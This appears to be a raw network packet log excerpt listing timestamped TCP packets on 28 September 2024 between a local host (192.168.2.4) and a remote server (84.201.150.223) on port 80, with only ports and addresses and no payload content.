Sep 28, 2024 17:52:13.920428038 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.920435905 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.921983004 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922035933 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922126055 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922139883 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922153950 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922168970 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922182083 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922190905 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922202110 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922208071 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922229052 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922246933 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922255993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922262907 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922278881 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922286987 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922296047 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922307968 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922314882 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922323942 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922331095 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922341108 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922349930 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922362089 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922363997 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922383070 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922405005 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.922936916 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922950029 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.922957897 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923038006 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923096895 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923111916 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923126936 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923142910 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923150063 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923183918 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923190117 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923199892 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923217058 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923223972 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923233986 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923249960 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923250914 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923271894 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923296928 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923324108 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923338890 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923355103 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923377037 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923397064 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923561096 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923576117 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923592091 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923607111 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923615932 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923621893 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923649073 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923682928 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923707962 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923723936 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923789978 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923803091 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.923939943 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.923995972 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.924161911 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.924216986 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.924268961 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.924283981 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.924299955 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.924315929 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.924319029 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.924354076 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.924384117 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.924396038 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.924411058 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.924447060 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.924460888 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.953548908 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.953564882 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.953581095 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.953596115 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.953610897 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.953624964 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.953636885 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.953641891 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.953696012 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.953707933 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.954289913 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.954304934 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.954319954 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.954334974 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.954334974 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.954346895 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.954350948 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.954368114 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.954372883 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.954381943 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.954385042 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.954410076 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.954437017 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.966223955 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966270924 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966286898 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966320992 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966344118 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966353893 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.966360092 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966375113 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966392994 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966399908 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.966418982 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966420889 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.966437101 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966444016 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.966453075 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966470003 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966471910 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.966485023 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966500044 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.966502905 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966520071 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.966526031 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.966553926 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.966581106 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.006412983 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006431103 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006447077 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006464958 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006545067 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.006582975 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006594896 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.006623983 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006639957 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006644964 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.006654024 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006675005 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.006676912 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006694078 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006709099 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006721020 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.006726027 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006742001 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006748915 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.006758928 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006773949 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.006791115 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.006812096 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.006839037 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.007421970 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.007437944 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.007453918 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.007486105 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.007508993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.007554054 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.007570028 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.007584095 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.007601023 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.007601976 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.007635117 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.007658958 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008284092 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008300066 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008317947 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008338928 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008363008 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008363008 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008385897 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008402109 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008409977 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008419037 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008436918 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008460999 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008502960 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008518934 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008533955 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008552074 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008582115 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008737087 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008752108 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008768082 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008794069 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008805037 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008814096 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008829117 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008842945 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008862019 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008882999 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.008944988 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008960009 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008981943 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.008997917 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.009013891 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.009028912 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.009248018 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.010997057 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011013031 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011028051 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011042118 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011056900 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011058092 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011071920 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011085987 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011090040 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011102915 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011120081 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011131048 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011159897 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011261940 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011277914 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011291981 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011306047 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011308908 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011322021 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011337996 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011346102 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011346102 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011372089 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011408091 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011596918 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011612892 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011641026 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011643887 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011657953 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011665106 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011673927 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011683941 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011698008 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011707067 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011717081 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011723995 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011733055 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011749983 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011759043 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011774063 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011778116 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011778116 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011790991 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011801958 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011802912 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011818886 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011821032 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011836052 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011846066 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011850119 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.011879921 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.011897087 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012192011 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012207985 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012222052 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012249947 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012264013 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012281895 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012296915 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012312889 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012324095 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012329102 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012358904 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012363911 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012384892 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012417078 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012792110 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012837887 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012840033 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012855053 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.012878895 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012896061 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.012996912 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.013012886 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.013027906 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.013041019 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.013046980 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.013052940 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.013076067 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.013091087 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.042140007 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042154074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042167902 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042185068 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042207956 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042223930 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042238951 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042254925 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042269945 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042282104 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.042284966 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042308092 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042325974 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042340040 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042345047 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.042357922 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042366028 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.042373896 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.042386055 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.042412996 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.056632042 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056648016 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056662083 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056756020 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.056757927 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056776047 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056792021 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056807995 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056819916 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.056823969 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056852102 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.056868076 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056878090 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.056891918 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.056910992 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.056940079 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.057003021 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.057020903 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.057035923 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.057046890 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.057053089 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.057070017 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.057070017 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.057095051 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.057121992 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.097799063 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.097856998 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.097871065 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.097879887 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.097912073 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.097920895 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.098187923 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.098203897 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.098226070 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:14.098228931 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:14.098242044 CEST	80	49730	84.201.150.223	192.168.2.4
